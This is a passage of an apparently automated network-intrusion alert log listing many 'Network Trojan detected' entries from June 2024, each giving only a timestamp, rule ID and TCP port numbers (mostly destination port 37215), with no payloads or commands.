                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294081
                SID:2835222
                Source Port:34214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134976
                SID:2829579
                Source Port:42984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087200
                SID:2835222
                Source Port:33502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792405
                SID:2829579
                Source Port:57406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291915
                SID:2829579
                Source Port:56158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761132
                SID:2835222
                Source Port:52632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847400
                SID:2829579
                Source Port:44192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452462
                SID:2835222
                Source Port:34454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453337
                SID:2835222
                Source Port:48204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034104
                SID:2835222
                Source Port:56534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073491
                SID:2829579
                Source Port:54164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082485
                SID:2829579
                Source Port:48862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813025
                SID:2835222
                Source Port:47148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944359
                SID:2835222
                Source Port:53060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276474
                SID:2829579
                Source Port:46276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772255
                SID:2829579
                Source Port:50792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677859
                SID:2835222
                Source Port:50294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519119
                SID:2829579
                Source Port:56244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733378
                SID:2829579
                Source Port:39636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150224
                SID:2835222
                Source Port:51376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984870
                SID:2835222
                Source Port:58020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293665
                SID:2829579
                Source Port:39610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761325
                SID:2835222
                Source Port:39310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025132
                SID:2829579
                Source Port:50742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:03.525464
                SID:2840515
                Source Port:60342
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183260
                SID:2835222
                Source Port:51350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052924
                SID:2835222
                Source Port:53724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702648
                SID:2835222
                Source Port:33464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913825
                SID:2829579
                Source Port:58506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917773
                SID:2829579
                Source Port:38396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999262
                SID:2835222
                Source Port:60906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917307
                SID:2835222
                Source Port:42024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763168
                SID:2835222
                Source Port:40730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274333
                SID:2829579
                Source Port:48816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294296
                SID:2829579
                Source Port:44426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761629
                SID:2835222
                Source Port:51054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943657
                SID:2829579
                Source Port:37446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830042
                SID:2835222
                Source Port:53140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967050
                SID:2829579
                Source Port:39572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082253
                SID:2835222
                Source Port:51634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132643
                SID:2835222
                Source Port:36350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519518
                SID:2835222
                Source Port:45918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880280
                SID:2829579
                Source Port:57154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368561
                SID:2835222
                Source Port:59230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859021
                SID:2835222
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.933539
                SID:2835222
                Source Port:34924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667673
                SID:2835222
                Source Port:50114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022022
                SID:2835222
                Source Port:53306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110839
                SID:2829579
                Source Port:58154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132936
                SID:2835222
                Source Port:51280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565968
                SID:2835222
                Source Port:55216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972194
                SID:2835222
                Source Port:51152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567360
                SID:2829579
                Source Port:42090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762682
                SID:2835222
                Source Port:52008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180997
                SID:2835222
                Source Port:47818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277551
                SID:2829579
                Source Port:60130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023635
                SID:2835222
                Source Port:59798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053550
                SID:2835222
                Source Port:47462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808016
                SID:2829579
                Source Port:41484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.335970
                SID:2829579
                Source Port:50436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032855
                SID:2829579
                Source Port:47536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723372
                SID:2829579
                Source Port:57194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111273
                SID:2835222
                Source Port:60190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024895
                SID:2835222
                Source Port:50434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641411
                SID:2829579
                Source Port:60804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165302
                SID:2835222
                Source Port:55248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850238
                SID:2835222
                Source Port:50444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013557
                SID:2835222
                Source Port:51490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276436
                SID:2835222
                Source Port:48118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072387
                SID:2835222
                Source Port:49326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092225
                SID:2835222
                Source Port:57628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944033
                SID:2829579
                Source Port:48550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.081815
                SID:2829579
                Source Port:35570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789083
                SID:2835222
                Source Port:41998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470329
                SID:2835222
                Source Port:50632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244581
                SID:2835222
                Source Port:52380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110996
                SID:2835222
                Source Port:58286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012181
                SID:2835222
                Source Port:34194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660691
                SID:2835222
                Source Port:52254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971683
                SID:2829579
                Source Port:37274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134818
                SID:2829579
                Source Port:37114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411740
                SID:2835222
                Source Port:38260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646535
                SID:2835222
                Source Port:38316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032595
                SID:2829579
                Source Port:40558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072078
                SID:2829579
                Source Port:55734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718205
                SID:2829579
                Source Port:58860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133108
                SID:2829579
                Source Port:43710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342132
                SID:2829579
                Source Port:57408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250908
                SID:2835222
                Source Port:59166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791784
                SID:2829579
                Source Port:37656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203095
                SID:2835222
                Source Port:59844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762468
                SID:2829579
                Source Port:50374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807864
                SID:2835222
                Source Port:54168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763235
                SID:2829579
                Source Port:49068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702693
                SID:2829579
                Source Port:49110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643340
                SID:2835222
                Source Port:40320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681251
                SID:2829579
                Source Port:35274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989422
                SID:2835222
                Source Port:44942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790553
                SID:2829579
                Source Port:40484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862275
                SID:2835222
                Source Port:36504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179975
                SID:2829579
                Source Port:41918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702744
                SID:2829579
                Source Port:54088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339630
                SID:2829579
                Source Port:59736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675404
                SID:2835222
                Source Port:34844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.900189
                SID:2829579
                Source Port:56208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087878
                SID:2835222
                Source Port:57258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201809
                SID:2835222
                Source Port:56594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275847
                SID:2829579
                Source Port:42976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969179
                SID:2829579
                Source Port:38698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.566362
                SID:2829579
                Source Port:46484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545708
                SID:2829579
                Source Port:52312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858010
                SID:2835222
                Source Port:56314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943252
                SID:2829579
                Source Port:38940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472149
                SID:2829579
                Source Port:38692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685303
                SID:2829579
                Source Port:40206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028748
                SID:2829579
                Source Port:59692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146815
                SID:2829579
                Source Port:43730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985962
                SID:2829579
                Source Port:56432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663151
                SID:2829579
                Source Port:53274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880343
                SID:2829579
                Source Port:41050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932410
                SID:2829579
                Source Port:41480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111082
                SID:2835222
                Source Port:48412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762330
                SID:2835222
                Source Port:52666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420988
                SID:2829579
                Source Port:49226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419924
                SID:2835222
                Source Port:49302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727874
                SID:2835222
                Source Port:58146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146648
                SID:2829579
                Source Port:36744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989569
                SID:2835222
                Source Port:42472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725276
                SID:2829579
                Source Port:52034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984970
                SID:2835222
                Source Port:57280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806339
                SID:2835222
                Source Port:53132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624816
                SID:2835222
                Source Port:53028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010924
                SID:2829579
                Source Port:47402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660266
                SID:2835222
                Source Port:42152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094623
                SID:2829579
                Source Port:47008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766173
                SID:2835222
                Source Port:53240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343084
                SID:2835222
                Source Port:46018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201497
                SID:2835222
                Source Port:47164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275058
                SID:2835222
                Source Port:35552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943958
                SID:2829579
                Source Port:36136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.386267
                SID:2829579
                Source Port:53678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.904741
                SID:2829579
                Source Port:60226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544785
                SID:2835222
                Source Port:38216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830460
                SID:2829579
                Source Port:35568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013693
                SID:2835222
                Source Port:33406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661364
                SID:2829579
                Source Port:59112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473598
                SID:2835222
                Source Port:49566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227420
                SID:2835222
                Source Port:57742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179487
                SID:2835222
                Source Port:43786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020030
                SID:2835222
                Source Port:44538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643278
                SID:2835222
                Source Port:58900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185013
                SID:2835222
                Source Port:44688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986110
                SID:2835222
                Source Port:41618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022498
                SID:2835222
                Source Port:37512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778107
                SID:2829579
                Source Port:50638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244551
                SID:2829579
                Source Port:47690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321459
                SID:2835222
                Source Port:47600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183933
                SID:2829579
                Source Port:42668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703310
                SID:2835222
                Source Port:45824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792539
                SID:2835222
                Source Port:34622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502405
                SID:2829579
                Source Port:41792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984569
                SID:2829579
                Source Port:57056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276286
                SID:2829579
                Source Port:39794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407392
                SID:2829579
                Source Port:50562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243084
                SID:2835222
                Source Port:43468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289734
                SID:2829579
                Source Port:46870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073936
                SID:2835222
                Source Port:55604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165396
                SID:2835222
                Source Port:38792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669746
                SID:2829579
                Source Port:43444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662864
                SID:2829579
                Source Port:36760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409838
                SID:2835222
                Source Port:34508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568701
                SID:2829579
                Source Port:39008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451785
                SID:2829579
                Source Port:43552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149403
                SID:2835222
                Source Port:56684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776531
                SID:2829579
                Source Port:60298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200556
                SID:2829579
                Source Port:56718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186016
                SID:2835222
                Source Port:49414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704824
                SID:2829579
                Source Port:44646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675865
                SID:2835222
                Source Port:47258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848595
                SID:2835222
                Source Port:51240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917040
                SID:2835222
                Source Port:36606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772359
                SID:2835222
                Source Port:50268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071076
                SID:2829579
                Source Port:47748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225677
                SID:2829579
                Source Port:48386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857803
                SID:2829579
                Source Port:52176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082305
                SID:2829579
                Source Port:37312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966863
                SID:2829579
                Source Port:41648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.093021
                SID:2835222
                Source Port:56210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858759
                SID:2835222
                Source Port:51196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643769
                SID:2835222
                Source Port:41540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275359
                SID:2835222
                Source Port:48496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276908
                SID:2829579
                Source Port:46104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001384
                SID:2829579
                Source Port:40626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905174
                SID:2829579
                Source Port:54500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789424
                SID:2829579
                Source Port:42422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810475
                SID:2835222
                Source Port:50136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733627
                SID:2835222
                Source Port:57852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
